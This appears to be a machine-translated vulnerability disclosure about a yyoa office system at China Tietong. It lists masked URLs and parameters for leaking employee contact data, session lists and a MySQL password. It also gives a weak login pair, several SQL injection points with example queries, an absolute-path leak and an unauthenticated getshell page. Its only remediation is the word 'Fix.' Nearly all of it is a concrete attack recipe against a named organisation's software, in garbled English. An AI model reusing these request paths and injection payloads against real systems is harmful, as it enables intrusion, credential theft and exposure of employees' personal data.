Leakage of employee contact information of sensitive information in China tietong system/no need to log on to getshell

Leakage of employee contact information of sensitive information in China tietong system/no need to log on to getshell

China tietong employee contact information leakage of sensitive information in a system + session leakage + weak password + mysql password leakage + Multiple SQL injection points + absolute path leakage + getshell login not required + Intranet Server login #2

#1 leakage of employee contact information with sensitive information

Http: // **. **: 6789/yyoa/assess/js/initDataAssess. jsp

Http: // ***. **: 6789/yyoa/common/selectPersonNew/initData. jsp? TrueName = 1
 

 

# 2session Leakage

Http: // ***. **: 6789/yyoa/ext/https/getSessionList. jsp? Cmd = getAll
 

# 3mysql password Leakage

Http: // **. **: 6789/yyoa/createMysql. jsp
 

#3 weak passwords

Hchun 1, 123456
 

 

 

#4 view the Database Name

Http: // ***. **: 6789/yyoa/common/js/menu/test. jsp? DoType = 101 & S1 = select % 20 database ()
 

#5 Multiple SQL injection points

Http: // ***. **: 6789/yyoa/common/selectPersonNew/initData. jsp? TrueName = 1

Http: // ***. **: 6789/yyoa/checkWaitdo. jsp? UserID = 1

Http: // ***. **: 6789/yyoa/common/js/menu/test. jsp? DoType = 101 & S1 = *



Manually prove DBA Permissions

Http: // ***. **: 6789/yyoa/common/js/menu/test. jsp? DoType = 101 & S1 = select % 20 user ()
 

#6 absolute path Leakage

Http: // ***. **: 6789/yyoa/common/js/menu/test. jsp? DoType = 101 & S1 = select % 20 @ basedir
 

#7 login to getshell is not required

Http: // **. **: 6789/yyoa/zhengkai. jsp

Kai
 

#8. log on to an intranet Server

Too slow

Cut a picture at will
 

Solution:

Fix.